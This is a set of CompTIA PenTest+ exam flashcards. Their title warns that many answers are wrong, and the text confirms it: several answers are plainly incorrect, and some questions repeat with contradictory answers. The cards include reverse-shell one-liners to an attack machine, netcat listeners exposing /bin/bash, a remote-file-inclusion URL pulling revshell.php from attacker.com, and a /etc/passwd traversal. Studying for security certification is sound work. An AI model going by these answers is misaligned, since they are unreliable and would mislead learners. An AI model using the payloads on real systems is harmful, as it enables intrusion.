***DO NOT USE*** SO MANY INCORRECT ANSWERS ARE PROVIDED: CompTIA Pentest PT0-001 (Exam Boost) Exam 1 Flashcards

1
Q

A penetration tester has performed a security assessment for a startup firm.

The report lists a total of ten vulnerabilities, with five identified as critical.

The client does not have the resources to immediately remediate all vulnerabilities.

Under such circumstances, which of the following would be the BEST suggestion for the client?

A.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then re-prioritize remediation
B.Identify the issues that can be remediated most quickly and address them first
C.Implement the least impactful of the critical vulnerability remediations first and then address the other critical vulnerabilities
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over an extended period of time

A

D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over an extended period of time

2
Q
Which of the following is the reason why a pentester would run the following command at the end of an engagement?
A.To remove the persistence
B.To enable persistence
C.To report persistence
D.To check for persistence
A

A.To remove the persistence

3
Q

A pentester wants to target the NetBIOS name service.
Which of the following is the MOST likely command to exploit the NetBIOS name service?
A.arpspoof
B.nmap
C.responder
D.burpsuite

A

A.arpspoof

4
Q

A security consultant receives a document outlining the scope of an upcoming pentest.

This document contains IP addresses and times that each can be scanned.

Which of the following would contain this information?
A.Rules of Engagement
B.Request for Proposal
C.Master Service Agreement
D.Business Impact Analysis
A

A.Rules of Engagement

5
Q

A pentester was able to enter SQL injection commands into a text box and gain access to the information stored in the database.

Which of the following is the best recommendation that would mitigate the vulnerability?
A.Randomize the credentials used to log in.
B.Install host-based intrusion detection
C.Implement input normalization
D.Perform system hardening

A

C.Implement input normalization

6
Q
Which of the following tools would a pentester use to conduct OSINT?
A.Shodan
B.SET
C.BeEF
D.Wireshark
E.Maltego
F.Dynamo
A

A.Shodan

E.Maltego

7
Q

A pentester is performing ARP spoofing against a switch.

Which of the following should the pentester spoof to get the most information?
A.MAC Address of the client
B.MAC Address of the Domain Controller
C.MAC address of the web server
D.MAC address of the gateway
A

D.MAC address of the gateway

8
Q

A pentester is able to move laterally throughout the domain with minimal roadblocks after compromising a single workstation.

Which of the following mitigation strategies would be BEST to recommend in the report?
(SELECT THREE)
A.Randomize local administrator credentials for each machine.
B.Disable remote logons for local administrators
C.Require multifactor authentication for all logins
D.Increase minimum password complexity requirements
E.Apply additional network access control
F.Enable Full-Disk Encryption on every workstation
G.Segment each host into its own VLAN

A

D.Increase minimum password complexity requirements
C.Require multifactor authentication for all logins
E.Apply additional network access control

9
Q

A security consultant is trying to attack a device with a previously identified user account.

The consultant is utilizing Metasploit SMB vulnerabilities and is able to dump hashes.

Which of the following types of attacks is being executed?
A.Credential Dump Attack
B.DLL Injection Attack
C.Reverse Shell Attack
D.Pass the hash attack
A

A.Credential Dump Attack

10
Q

During a web application assessment, a pentester discovers that arbitrary commands can be executed on the server.

Wanting to take this attack one step further, the pentester begins to explore ways to gain a reverse shell back to the attack machine at 192.168.1.5.

Which of the following are possible ways to do so?
(CHOOSE TWO)
A.nc 192.168.1.5 44444
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/f
D.nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444 >/tmp/f
F.rm /tmpf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

A

B.nc -nvlp 44444 -e /bin/sh

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/

11
Q
Which of the following commands starts the Metasploit database?
A.msfconsole
B.workspace
C.msfvenom
D.db_init
E.db_connect
A

A.msfconsole

12
Q

A pentester is in the process of writing a report that outlines the overall level of risk to operations.

In which of the following areas of the report should the penetration tester put this?
A.Appendixes
B.Executive Summary
C.Technical Summary
D.Main Body
A

B.Executive Summary

13
Q

A pentester identifies the following findings during an external vulnerability scan:

Vulnerability:
Multiple unsupported versions of Apache found (Ports 80, 443)
SSLv3 accepted on HTTPS connections (443)
Mod_rewrite enabled on Apache servers (80,443)
Windows Server 2012 Host Found (21)

A.Obsolete software may contain exploitable components
B.Weak password management practices may be employed
C.Cryptographically weak protocols may be intercepted
D.Web server configurations may reveal sensitive information

A

D.Web server configurations may reveal sensitive information

14
Q
Which of the following types of intrusion techniques is the use of an under-the-door tool during a physical security assessment an example of?
A.Lockpicking
B.Egress sensor triggering
C.Lock bumping
D.Lock bypass
A

D.Lock bypass

15
Q

During a test, a critical vulnerability is discovered on a client's core server.
Which of the following should be the next action?
A.Disable the network port of the affected service
B.Complete all findings, and then submit them to the client
C.Promptly alert the client with details of the finding
D.Take the target offline so it cannot be exploited by an attacker

A

C.Promptly alert the client with details of the finding

16
Q

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic.
The next step the pentester wants to take is to capture all the victim web traffic unencrypted.

Which of the following would meet this goal?
A.Perform an HTTP downgrade attack
B.Harvest the user credentials to decrypt traffic
C.Perform a MITM attack
D.Implement a CA attack by impersonating trusted CAs

A

A.Perform an HTTP downgrade attack

17
Q

A pentester wants to script out a way to discover all the PTR records for a range of IP addresses.

Which of the following is the MOST efficient to utilize?
A.nmap -p 53 -oG dnslist.txt | cut -d ";" -f4
B.nslookup -ns 8.8.8.8 << dnslist.txt
C.for x in {1..254}; do dig -x 192.168.$x.$x;done
D.dig -r > echo "8.8.8.8" >> /etc/resolv.conf

A

D.dig -r > echo "8.8.8.8" >> /etc/resolv.conf

18
Q

An engineer, who is conducting a pentest for a web application, discovers the user login process sends data using the HTTP GET method.

To mitigate the risk of exposing sensitive information, the form should be sent using an:

A.HTTP POST method
B.HTTP OPTIONS method
C.HTTP PUT method
D.HTTP TRACE method

A

A.HTTP POST method

19
Q

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled 'changepass'.

-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using strings to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%S/changepw
malloc
strlen

Given this information, which of the following is the MOST likely path to exploitation to achieve root privileges on the machine?
A.Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
B.Create a copy of changepass in the same directory naming it changepw. Export the ENV_PATH environment variable to the path ‘/home/user’. Then run changepass
C.Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'

A

D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'

20
Q

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application

A

D.Stop external calls from the application

21
Q

A pentester is performing a remote scan to determine if the server farm is compliant with the company's software baseline.

Which of the following should the pentester perform to verify compliance with the baseline?
A.Discovery Scan
B.Stealth Scan
C.Full Scan
D.Credentialed Scan
A

D.Credentialed Scan

22
Q

A pentester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department.

Afterward, the pentester obtained hashes over the VPN and easily cracked them with a dictionary attack.

Which of the following remediation steps should be recommended? (SELECT THREE)
A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
C.Install an Intrusion Prevention System
D.Increase Password Complexity
E.Install a security information event monitoring system
F.Prevent members of the IT department from interactively logging in as administrators
G.Upgrade the cipher suite used for the VPN solution

A

A.Mandate all employees take security awareness training
B.Implement two-factor authentication for remote access
D.Increase Password Complexity

23
Q

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application

A

B.Block URL Redirections

24
Q

In which of the following scenarios would a tester perform a Kerberoasting attack?
A.The tester has compromised a Windows devices and dumps the LSA secrets
B.The tester needs to retrieve the SAM database and crack the password hashes
C.The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement
D.The tester has compromised an account and needs to dump hashes and plaintext passwords from the system

A

C.The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement

26
Q

A pentester is reviewing the following output from a wireless sniffer:

ESSID    BSSID               Encryption   Channel   WPS
Guest    AD:1F:AB:10:33:78   OPEN         6         N
Secure   AD:1F:AB:10:33:79   WPA2-PSK     6         N
Dev      AD:1F:AB:10:33:70   WPA2-ENT     11        N

A.Hardware Vendor
B.Channel Interface
C.Usernames
D.Key Strength

A

C.Usernames

28
Q
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A.HKEY_CLASSES_ROOT
B.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_CURRENT_CONFIG
A

C.HKEY_CURRENT_USER

29
Q

A pentester is preparing to conduct API testing.

Which of the following would be MOST helpful in preparing for this engagement?
A.Nikto
B.WAR
C.W3AF
D.Swagger
A

D.Swagger

30
Q

During an internal network pentest, a tester recovers the NTLM password hash for a user known to have full admin privileges on a number of target systems.

Efforts to crack the hash and recover the plaintext password have been unsuccessful.

Which of the following would be the BEST target for continued exploitation efforts?
A.Windows 7 (Ports 23, 161)
B.Windows Server 2016 (Ports 53,5900)
C. Windows 8.1 Open (Ports 445, 3389)
D.Windows 8 (Ports 514,3389)
A

A.Windows 7 (Ports 23, 161)

31
Q

A pentester delivers a web application vulnerability scan report to a client.
The pentester rates a vulnerability as medium severity.
The same vulnerability was reported as a critical finding on the previous report.
Which of the following is the most likely reason for the reduced severity?
A.The client has applied a hot fix without updating the version
B.The threat landscape has significantly changed
C.The client updated their codebase with new features
D.There are currently no known exploits for this vulnerability

A

A.The client has applied a hot fix without updating the version

32
Q
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the CEO logs in, to obtain the CEO's login credentials.
A.Elicitation attack
B.Impersonation attack
C.Spear phishing
D.Drive-by download attack
A

C.Spear phishing

33
Q

A pentester is scanning a network for SSH and has a list of provided targets.

Which of the following nmap commands should the tester use?
A.nmap -p 22 -iL targets
B.nmap -p 22 -sL targets
C.nmap -p 22 -oG targets
D.nmap -p 22 -oA targets
A

A.nmap -p 22 -iL targets

34
Q
A pentester has compromised a host.
Which of the following would be the correct syntax to create a Netcat listener on the device?
A.nc -l -p 4444 /bin/bash
B.nc -vp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -lp 4444 /bin/bash
A

D.nc -lp 4444 /bin/bash

35
Q

A pentester has been assigned to perform an external pentest assessment of a company.

Which of the following would BEST help with passive information gathering?

A.Wait outside the company’s building and attempt to tailgate behind an employee

B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access

C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications

D.Search social media for information technology employees who post information about the tech they work with

E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access

A

C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications

36
Q

A client asks a pentester to add more addresses to a test currently in progress.

Which of the following would define the target list?
A.Rules of engagement
B.Master Service Agreement
C.Statement of Work
D.End-User License Agreement
A

C.Statement of Work

37
Q

Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a pentest?
A.Pentest findings often contain intellectual property
B.Pentest findings could lead to consumer dissatisfaction if made public
C.Pentest findings are legal documents containing privileged information
D.Pentest findings can assist an attacker in compromising a system

A

D.Pentest findings can assist an attacker in compromising a system

38
Q
A pentester has compromised a host.
Which of the following would be the correct syntax to create a Netcat listener on the device?
A.nc -l -p 4444 /bin/bash
B.nc -vp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -lp 4444 /bin/bash
A

A.nc -l -p 4444 /bin/bash

39
Q

A pentester has been assigned to perform an external pentest assessment of a company.

Which of the following would BEST help with passive information gathering? (Choose two)

A.Wait outside the company’s building and attempt to tailgate behind an employee

B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities and attempt to gain access

C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications

D.Search social media for information technology employees who post information about the tech they work with

E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access

A

C.Use domain and IP registry websites to identify the company's external netblocks and external facing applications

D.Search social media for information technology employees who post information about the tech they work with

40
Q

A software development team recently migrated to new application software on the on-premise environment.

Pentest findings show that multiple vulnerabilities exist.

If a pentester does not have access to a live or test environment, it might be better for the tester to create the same environment on a VM.

Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration

A

D.Misconfiguration

42
Q

A pentester is checking a script to determine why some basic math errors are persisting

The expected result was the program outputting “True”.

root:~# cat ./test.sh
#!/bin/bash
source=10
let dest5=5
if ['source' = 'dest' ] ; then
echo "True"
else 
echo "False"
fi
#End of File

Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose Two)
A.Change ‘fi’ to ‘Endli’
B.Remove the ‘let’ in front of ‘dest=5+5’
C.Change the ‘=’ to ‘eq’
D.Change source and dest to "$source" and "$dest"
E.Change ‘else’ to ‘elif’

A

C.Change the ‘=’ to ‘eq’

E.Change ‘else’ to ‘elif’

43
Q

After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable.

The client claims to have been billed unfairly.

Which of the following documents would most likely be able to provide guidance in such a situation?
A.SOW
B.NDA
C.EULA
D.BPA
A

A.SOW

44
Q

A software development team recently migrated to new application software on the on-premise environment.

Pentest findings show that multiple vulnerabilities exist.

If a pentester does not have access to a live or test environment, a test might be better to create the same environment on the VM.

Which of the following is most important for confirmation?
A.Unsecure service and protocol configuration
B.Running SMB and SMTP service
C.Weak password complexity and user account
D.Misconfiguration

A

A.Unsecure service and protocol configuration

45
Q

A tester has captured a NetNTLMv2 hash using Responder.

Which of the following commands will allow the tester to crack the hash using a mask attack?
A.hashcat -m 5600 -r rule/bestG4.rule hash.txt wordlist.txt
B.hashcat -m 5600 hash.txt
C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?
D.hashcat -m 5600 -o results.text hash.txt wordlist.txt

A

C.hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?

46
Q

A pentester has run the following Nmap scan on a computer:

'nmap -aV 192.168.1.5'

The organization said it had disabled telnet from its environment.

However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.

Which of the following is the BEST explanation for what happened?
A.The organization failed to disable Telnet
B.Nmap results contain a false positive for port 23
C.Port 22 was filtered
D.The service is running on a non-standard port

A

D.The service is running on a non-standard port

48
Q
Which of the following has a direct and significant impact on the budget of the security assessment?
A.Scoping
B.Scheduling
C.Compliance requirement
D.Target Risk
A

A.Scoping

49
Q

During an internal pentest, several multicast and broadcast name resolution requests are observed traversing the network.

Which of the following tools could be used to impersonate network resources and collect authentication requests?
A.Ettercap
B.Tcpdump
C.Responder
D.Medusa
A

A.Ettercap

50
Q

Given the following URL:

http://example.com/download.php?id=../../../etc/passwd

Which of the following best describes the above attack?
A.Malicious file upload attack
B.Redirect attack
C.Directory traversal attack
D.Insecure direct object reference attack

A

C.Directory traversal attack